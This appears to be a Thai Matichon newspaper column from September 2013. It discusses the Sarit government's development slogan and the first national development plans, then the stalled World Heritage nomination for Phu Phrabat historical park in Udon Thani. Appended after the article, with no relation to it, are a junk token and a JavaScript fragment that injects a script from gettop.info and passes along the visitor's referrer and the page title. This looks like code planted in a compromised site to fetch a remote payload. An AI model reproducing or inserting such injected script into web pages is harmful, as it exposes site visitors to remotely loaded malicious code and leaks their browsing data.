มติชนรายวัน ฉบับประจำวันพุธที่ 25 กันยายน 2556

น้ำไหล ไฟสว่าง ทางดี มีงานทำ

          “น้ำไหล ไฟสว่าง ทางดี มีงานทำ” เป็นคำขวัญ(คล้องจอง)เพื่อพัฒนาประเทศไทยไปสู่ความทันสมัย

          ที่รัฐบาลจอมพลสฤษดิ์ ธนะรัชต์ สร้างขึ้นมาปลุกใจประชาชนให้เห็นดีเห็นงามกับแผนพัฒนาเศรษฐกิจแห่งชาติ ฉบับที่ 1 (พ.ศ. 2504-2509) เริ่มเมื่อวันที่ 1 มกราคม พ.ศ. 2504

          แผนพัฒนาฯ ฉบับที่ 1 เน้นพัฒนาโครงสร้างพื้นฐาน (“ถนน น้ำ ไฟ”) เพื่ออำนวยความสะดวกให้แก่ธุรกิจของเอกชนทั้งในภาคเกษตรและนอกภาคเกษตร ต่อเนื่องถึงแผนพัฒนาฯ ฉบับที่ 2 (พ.ศ. 2510-2514)

          แผนพัฒนาฯ ตั้งแต่ฉบับแรก จะไปได้ดียิ่งถ้าทำตามแผนอย่างเคร่งครัด

          แต่แล้วความอ่อนแอทางการเมืองช่วงครึ่งหลังยุคสฤษดิ์ จึงมีสิ่งแปลกปลอมเรียกชื่อต่างๆกันว่า โครงการใต้ดิน, โครงการฟ้าผ่า เป็นประกาศิตให้ต้องมีและต้องทำ โดยไม่ผ่านขบวนการกลั่นกรองของสภาพัฒน์

          เหล่านี้ เป็นความรู้ใหม่ที่ผมอ่านแล้วสรุปจากหนังสือพลังเทคโนแครต ผ่านชีวิตและงานของ เสนาะ อูนากูล (สำนักพิมพ์มติชน 2556 หนา 344 หน้า ราคา 215 บาท)

          แต่สิ่งที่กล่าวขวัญทางลบให้ได้ยินสืบมาช้านาน คือแผนพัฒนาฯ มีลักษณะ“เห็นช้างขี้ ขี้ตามช้าง” เพราะ“ตามก้นอเมริกัน” ซึ่งไม่นำไปสู่ความทันสมัยหรือความเป็นสมัยใหม่อย่างแท้จริง

          โครงการใต้ดิน, โครงการฟ้าผ่า ตามที่คุณเสนาะเขียนเล่าในเล่มนี้ น่าจะส่งผลให้มีข้อวิจารณ์ตามมาในสมัยหลังว่า “ทันสมัย แต่ไม่พัฒนา”

ภูพระบาท (จ. อุดรธานี) ยังไม่มีอนาคต

          อุทยานประวัติศาสตร์ภูพระบาท (อ. บ้านผือ จ. อุดรธานี) ได้รับการประกาศรายชื่อในบัญชีเบื้องต้นของมรดกโลก จากศูนย์มรดกโลกยูเนสโก ณ กรุงปารีส เมื่อ พ.ศ. 2547

          ตามข้อตกลงสากลอันเป็นที่รับรู้กันทั่วไป ฝ่ายไทยต้องทำเอกสารขอเสนอเป็นมรดกโลกส่งไปยังศูนย์มรดกโลกที่กรุงปารีส ภายใน 10 ปี (พ.ศ. 2557)

          ฝายไทย โดยกรมศิลปากร ลงมือทำงานนี้ตั้งแต่แรกได้รับประกาศรายชื่อในบัญชีเบื้องต้น ทั้งทำเอง และว่าจ้างกลุ่มเอกชนทำ

          แต่ไม่สำเร็จ จึงยังไม่ส่งเอกสารให้ยูเนสโกจนบัดนี้ ซึ่งจะหมดเวลาที่กำหนดในปีหน้าแล้ว

          ท้องถิ่นอุดรธานี น่าจะติดตามเรื่องนี้ แล้วร่วมกันตีฆ้องร้องป่าวแบ่งปันเผยแพร่ความเป็นมาของภูพระบาท (พระบาทบัวบก พระบาทบัวบาน) ที่มีหลักฐานประวัติศาสตร์โบราณคดี ว่าข้ามโขงไปเกี่ยวข้องกับนครเวียงจันอย่างแยกไม่ได้

zp8497586rq

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;